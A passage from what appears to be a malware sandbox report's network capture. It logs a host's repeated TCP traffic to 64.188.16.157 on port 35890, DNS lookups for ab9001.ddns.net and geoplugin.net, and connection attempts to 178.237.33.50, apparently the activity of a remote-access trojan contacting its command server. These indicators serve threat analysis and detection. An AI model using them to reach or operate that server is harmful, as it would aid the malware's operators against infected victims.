      Jul 3, 2024 08:44:06.348885059 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.348942995 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.348954916 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.348965883 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.348999977 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349013090 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349037886 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349112034 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349122047 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349150896 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349215031 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349226952 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349258900 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349296093 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349307060 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349318027 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349328995 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349344969 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349369049 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349428892 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349441051 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349472046 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349495888 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349508047 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349518061 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349534035 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349560976 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349734068 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349745035 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349756002 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349766970 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349777937 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349817038 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.349925041 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349937916 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.349965096 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.350045919 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350056887 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350068092 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350089073 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350095034 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.350101948 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350114107 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350120068 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.350123882 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350136042 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350146055 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.350178003 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.350414991 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350430012 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.350464106 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.354492903 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354521990 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354531050 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354567051 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.354593039 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.354685068 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354703903 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354715109 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.354746103 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.360682011 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.360704899 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.360713959 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.360773087 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.360785961 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.360795975 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.412358046 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.661261082 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.661279917 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.661292076 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.661365986 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.665317059 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665340900 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665350914 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665381908 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.665416956 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665419102 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.665431976 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665442944 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.665469885 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.671446085 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.671494007 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.671504021 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.671508074 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.671546936 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.699790955 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.699806929 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.699819088 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.699927092 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.705461025 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.705490112 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.705501080 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.705533981 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.705565929 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.705590963 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.705601931 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.705662012 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.714056015 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714097023 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714107990 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714159966 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.714199066 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714210033 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714243889 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.714253902 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714267015 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714296103 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.714329958 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714342117 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714354038 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.714373112 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.714389086 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:06.747958899 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.747981071 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:06.748120070 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.020859003 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.021013021 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.021024942 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.021038055 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.021106005 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.021157980 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.025829077 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.025861979 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.025896072 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.025928020 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.025937080 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.025948048 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.025970936 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.031110048 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.031121969 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.031135082 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.031167030 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.031203032 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.034531116 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.034549952 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.034559011 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.034589052 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.084182978 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.101180077 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.101202965 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.101214886 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.101226091 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.101238012 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.101293087 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.107461929 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.107506037 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.107527018 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.162350893 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.485636950 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485683918 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485699892 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485713959 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485726118 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485727072 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.485763073 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.485857964 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485871077 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485882044 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485897064 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.485901117 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485913038 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.485913038 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485925913 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.485965967 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.486057043 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.486095905 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.486121893 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.486133099 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.486171007 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747541904 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747579098 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747590065 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747602940 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747616053 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747626066 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747627974 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747653961 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747689962 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747699976 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747769117 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747806072 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747821093 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747890949 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747901917 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747912884 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747924089 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.747932911 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.747961998 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748130083 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748147011 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748158932 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748172045 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748176098 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748183966 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748193026 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748205900 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748235941 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748361111 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748378992 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748389959 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748400927 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748410940 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748414040 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748441935 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748466015 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.748600006 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748611927 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.748651981 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.814955950 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.814974070 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.814987898 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.815036058 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.815094948 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.815105915 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.815116882 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.815128088 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.815140009 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.815174103 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.825398922 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.825417042 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.825428963 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.825439930 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.825448990 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.825484991 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.834299088 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.834345102 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:07.834373951 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:07.881072044 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.249033928 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.249062061 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.249155045 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.254292965 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254308939 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254321098 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254395962 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.254450083 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254487038 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.254540920 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254550934 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.254597902 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.648716927 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648741961 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648751974 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648763895 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648839951 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648852110 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648850918 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.648868084 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648879051 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.648900986 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.648922920 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.648951054 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.649061918 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.649072886 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.649084091 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.649094105 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.649120092 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713241100 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713334084 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713344097 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713362932 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713373899 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713385105 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713391066 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713397980 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713438034 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713536024 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713571072 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713639021 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713650942 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713666916 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713677883 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713689089 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713697910 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713699102 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.713713884 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.713743925 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.960825920 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960849047 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960866928 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960876942 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960887909 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960897923 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.960897923 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.960937977 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.960937977 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.991247892 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.991266012 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.991280079 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.991290092 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.991348982 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.996341944 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.996388912 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.996401072 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.996429920 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:08.996433020 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:08.996526957 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:09.001044989 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:09.001084089 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:09.001123905 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:09.001140118 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:09.052911997 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:09.147595882 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:09.193680048 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:11.168416023 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:11.174222946 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174237967 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174248934 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174263000 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174273968 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174338102 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:11.174392939 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:11.174767017 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174778938 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174820900 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.174829960 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.175301075 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180232048 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180315971 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180325985 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180335045 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180396080 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180404902 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.180974007 CEST358904971264.188.16.157192.168.2.6
      Jul 3, 2024 08:44:11.181068897 CEST4971235890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:27.890352011 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:27.891680956 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:27.896567106 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:58.327225924 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:44:58.335618973 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:44:58.340447903 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:45:28.520798922 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:45:28.522803068 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:45:28.527930975 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:45:51.120680094 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:45:51.459321976 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:45:52.256187916 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:45:53.553041935 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:45:56.053047895 CEST4971580192.168.2.6178.237.33.50
      Jul 3, 2024 08:45:58.818201065 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:45:58.820327044 CEST4971035890192.168.2.664.188.16.157
      Jul 3, 2024 08:45:58.825294018 CEST358904971064.188.16.157192.168.2.6
      Jul 3, 2024 08:46:00.943737030 CEST4971580192.168.2.6178.237.33.50

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 3, 2024 08:43:57.181727886 CEST5481053192.168.2.61.1.1.1
      Jul 3, 2024 08:43:57.323122978 CEST53548101.1.1.1192.168.2.6
      Jul 3, 2024 08:44:01.094228029 CEST6532753192.168.2.61.1.1.1
      Jul 3, 2024 08:44:01.102993011 CEST53653271.1.1.1192.168.2.6

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jul 3, 2024 08:43:57.181727886 CEST192.168.2.61.1.1.10x8351Standard query (0)ab9001.ddns.netA (IP address)IN (0x0001)false
      Jul 3, 2024 08:44:01.094228029 CEST192.168.2.61.1.1.10xd3f0Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jul 3, 2024 08:43:57.323122978 CEST1.1.1.1192.168.2.60x8351No error (0)ab9001.ddns.net64.188.16.157A (IP address)IN (0x0001)false
